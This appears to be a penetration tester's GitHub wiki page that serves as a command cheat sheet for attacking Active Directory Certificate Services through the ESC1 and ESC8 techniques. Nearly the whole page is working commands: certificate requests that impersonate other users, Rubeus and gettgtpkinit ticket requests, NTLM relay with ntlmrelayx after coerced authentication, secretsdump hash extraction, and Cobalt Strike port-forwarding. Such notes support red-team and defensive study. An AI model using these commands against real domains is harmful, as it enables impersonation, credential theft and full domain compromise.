Active Directory Certificate Services - CraigDonkin/Infrastructure GitHub Wiki

https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf

Enumeration

LDAP search to enumerate certificate authorities

ldapsearch -x -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,cn=Configuration,dc=<company name>,cd=<.com>" -H ldap://<ip> -D <username> -W "objectclass=pKIEnrollmentService"

Certify

https://github.com/GhostPack/Certify

  • Enumerate certificate authorities
certify.exe cas
  • Enumerate vulnerable templates
certify.exe find /vulnerable

Ceritpy

certipy find -u <username> -p <password> -dc-ip <ip>

ESC1 Attack

  • CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag is enabled

  • Client Authentication EKU

  • Grants domain users enrollment rights

  • Any domain user can request a certificate from the template, for any other domain user and then use it for authentication.

Certify

Certify.exe request /ca:<FQDN of certificate authority> /template:<vulnerable template> /altname:<user to compromise>

Certipy

certipy req -username <username> -password <password> -ca <certificate authority> -target <DNS hostname of CA> -template <template name> -upn <user to compromise> -dns <DNS server>

Convert certificate to pfx (Certify.exe)

  • Copy the -----BEGIN RSA PRIVATE KEY----- ... -----END CERTIFICATE----- section to a file on Linux/macOS, and run the openssl command to convert it to a .pfx. When prompted, don't enter a password:
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
cat cert.pfx | base64 -w 0

Use certificate to request a TGT

Rubeus.exe asktgt /user:<username> /certficate:<location of .pfx> /nowrap /ptt
Rubeus.exe asktgt /user:<username> /certificate:<base64 hash of certificate> /nowrap /ptt

ESC8 Attack

  • HTTP Enrollment interface is accessible and supports NTLM authentication

    • http://<hostanme>/certsrv

  • Requires at least one certificate that allows for domain computer enrollment and client authentication

  • Relay authentication to ADCS , for example using PetitPotam against a domain controller to NTLMRelayx and then onto ADCS.

    • Use the DomainController template for domain controller.

  • Generates a certificate for the machine account on the target

  • Use certificate to get a TGT.

  • You cannot relay a NTLM auth to the originating machine, so if the DC is also the CA then it's not possible.

Manual walkthrough

https://www.youtube.com/watch?v=QUTXge-9lRo

  • See if HTTP web enrollment is enabled
    • Check for 401 Unauthorized and WW-Authenticate: NTLM headers
curl -I http://<certificate authority>/certsrv/
  • Setup the NTLM relay
ntlmrelayx -debug -smb2support -t http://<hostname>/certsrv/certfnsh.asp --template <tempalte name> --adcs
  • Coerce authentication to the relay (PetitPotam, Print Spooler, DFSCoerce etc)
  • NTLM relay will present a Base64 certificate for the machine account. Save this to a file.
  • Request a TGT
gettgtpkinit.py -pfx-base $(cat certFile) "<domain>/<machinename>$" "finename.ccache" -dc-ip <DC IP>
  • Export ccache
export KRB5CCNAME=<filename.ccache>
  • Use the kerberos ticket with other tools such as secretsdump and getnthash.py
secretsdump -k '<domain name>/<machine account>$@<domain controller>' -debug -dc-ip <DC IP> -just-dc-user <username>

getnthash.py <domain>/<machinename>\$ -key <key from gettgtpkinit output> -dc-ip <DC IP>

Automated walkthrough - Certipy

  • Enumerate vulnerabilities
certipy find -u <username> -p <password> -dc-ip <DC IP>
  • Run certipy with relay command
certipy relay -template <template name> -ca <CA>

  • Coerce authentication to the machine running certipy (PetitPotam, Print Spooler, DFSCoerce etc)

  • .pfx file will be saved to the folder.

  • run certipy with auth command to get the hash for the machine account

certipy auth -pfx <pfx file> -dc-ip <DC IP>

ESC8 if CA is DC and using cobalt strike

  • If the CA is the DC then it is not possible to NTLM relay to itself.

  • Try to NTLM relay to gain access to a machine configured for unconstrained delegation

  • Setup portbender, a reverse port forward and a socks proxy to capture traffic on 445 and redirect to 8445

portbender 445 8445
rportfwd 8445 <IP of team server or localhost> 445
socks 1080
  • Run ntlmrelayx via proxychains and point to the web enrollment interface
proxychains ntlmrelayx.py -t http://<CA>/certsrv/certfnsh.asp -smb2support --adcs --no-http-server
  • Coerce authentication from the target to the host you're proxying commands through
  • The output will contain the machine account certificate.
  • Use the certificate with other attacks.

ESC8 if CA is not DC and using cobalt strike

  • Repeat same steps but the certificate will work against the machine account for the DC.
⚠️ **GitHub.com Fallback** ⚠️